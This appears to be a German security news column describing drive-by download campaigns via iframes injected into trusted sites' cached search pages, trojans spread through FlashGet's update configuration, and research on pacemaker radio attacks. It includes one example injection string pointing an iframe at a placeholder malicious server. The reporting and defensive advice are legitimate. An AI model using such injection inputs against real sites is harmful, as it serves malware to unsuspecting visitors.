Channel Security

"Besuchen Sie keine nicht vertrauenswürdigen Websites" ist ein alter Rat, wenn es darum geht, die Infektion mit Schädlingen zu vermeiden. Nun, inzwischen kann man das 'nicht' darin streichen: Auch vertrauenswürdige Websites liefern inzwischen Schadsoftware aus. Und wenn man schon einmal am Streichen ist, kann das 'vertrauenswürdigen' auch raus, und man erhält einen wirklich sicheren Tip: "Besuchen Sie keine Websites". Das ist leider genauso zweckführend, wie in Zeiten von Ajax "Schalten Sie aktive Inhalte aus" zu raten, damit schaltet man leider in den meisten Fällen komplette Webseiten aus.

Aber kommen wir zuerst zu den aktuellen Fällen. Den Anfang machten am 4. März von Dancho Danchev gemeldete Angriffe auf die Seiten von ZDNet Asia und TorrentReactor: Eingeschleuste IFrames leiten die Benutzer auf Webserver weiter, die dann versuchen, z.B. als Virenscanner oder Video-Codec getarnte Schadsoftware zu installieren. Dabei wird über den HTTP-Referer-Header darauf geachtet, dass die Besucher wirklich von einer manipulierten Seite kommen. Damit sollen Honeypots und Sicherheits-Forscher von der Schadsoftware ferngehalten werden. Um den iFrame einzuschleusen, nutzten die Verbrecher die Suchmaschinen-Optimierung der betroffenen Seiten: Jede Suchanfrage wurde lokal gecached. Die Angreifer mussten also nur nach dem gewünschten Stichwort und einer ladbaren Version des iFrame suchen und der Code wurde in den Cache übernommen:

Interessanter-Suchbegriff<IFRAME SRC="http://boeser-server/...">

F-Secure hat den Schädling als Trojan-Downloader:W32/Zlob.HOG identifiziert.

Dancho Danchev hat danach noch weitere Fälle aufgedeckt, die alle nach demselben Muster funktionieren: Weitere CNET-Seiten (TV.com, News.com und MySimon.com), Wired.com und History.com und mehr.

McAfee hat parallel dazu einen weiteren Massenangriff beobachtet, bei dem eine bösartige JavaScript-Datei in eigentlich vertrauenswürdige Websites eingeschleust wurde. Der enthaltene JavaScript-Code fügt dann einen iFrame ein, über den verschiedene Schwachstellen ausgenutzt werden sollen, um Schadcode auf dem Rechner des Besuchers einzuschleusen. Die Angriffe begannen bereits eine Woche vorher, wobei zuerst phpBB-Sites und später ASP-Sites betroffen waren. Bei den phpBB-Sites wurde der Schadcode über Social Engineering eingeschleust, bei den ASP-Sites wurden verschiedene Schwachstellen ausgenutzt. Sogar Trend Micros Virus Encyclopedia (VE) war Ziel eines entsprechenden Angriffs, allerdings ohne Erfolg.

Wenn "Besuchen Sie keine nicht vertrauenswürdigen Websites" keinen Schutz mehr bietet, "Besuchen Sie keine Websites" aber auch keine zufrieden stellende Lösung ist - wie kann man sich dann schützen? Zum einen gibt es inzwischen die Möglichkeit, den Web-Verkehr analog zu Mails und Downloads zu überwachen und ggf. zu filtern, z.B. mit dem im About Security CeBIT-Bericht vorgestellten Astaro Web Gateway. Zum anderen werden die Schadprogramme, die über die präparierten Webseiten eingeschleust werden sollen, von den meisten Virenscannern erkannt. Dem entsprechend ist ein aktueller und aktivierter Virenscanner ein guter Schutz vor diesen "drive-by-downloads" genannten Bedrohungen.

Und noch ein Trojaner

Kaspersky hat laut einem Blockeintrag im 'Analyst's Diary'-Weblog auf Viruslist.com verschiedene Trojaner im Download-Verzeichnis des Windows-Downloadmanagers FlashGet gefunden. Anscheinend wurde die Webseite des Herstellers kompromittiert und die Trojaner dort hinterlegt. Eine manipulierte Konfigurationsdatei FGUpdate3.ini führte dann zum automatischen Download der Trojaner. Inzwischen wurden die Trojaner von der Hersteller-Website entfernt, es ist aber weiterhin möglich, über eine präparierte FGUpdate3.ini-Datei automatisch Dateien von beliebigen Servern herunterladen zu lassen. Und was sagt der Hersteller dazu? Nichts, es gibt lediglich einen Forum-Thread ohne offizielle Beteiligung. Das alles sollte Grund genug sein, über die weitere Nutzung des Programms gründlich nachzudenken.

Gehackter Pacemaker

Nein, es geht hier nicht um Cowbows, wenn ich auch zugegeben muss, dass ich zuerst auch Peacemaker gelesen hatte. Ich muss als Kind zu viele Western geguckt und gelesen haben. Tatsächlich geht es aber um Herzschrittmacher, die inzwischen über eine Funkschnittstelle umkonfiguriert werden können. Gadi Evron hatte mögliche theoretische Angriffe bereits auf dem Chaos Communication Camp 2007 vorgestellt. Forscher der Universitäten von Washington und Massachusetts haben nun praktische Angriffe vorgestellt: "Pacemakers and Implantable Cardiac Defibrillators: Software Radio Attacks and Zero-Power Defenses" (PDF, FAQ). Das Ganze stellt bisher aber keine Bedrohung der Benutzer dar: Der Angreifer muss so nah an sein Opfer heran, dass er es auch einfach erwürgen oder erschlagen kann, statt mühsam den Herzschrittmacher auszuschalten Ich finde das ziemlich beängstigend - nicht als direkte Bedrohung, sondern allgemein: Da scheint man sich bei der Entwicklung dieser lebenswichtigen Geräte wenige Gedanken über Sicherheit gemacht zu haben. Wo überall wohl sonst auch nicht?

Carsten Eilers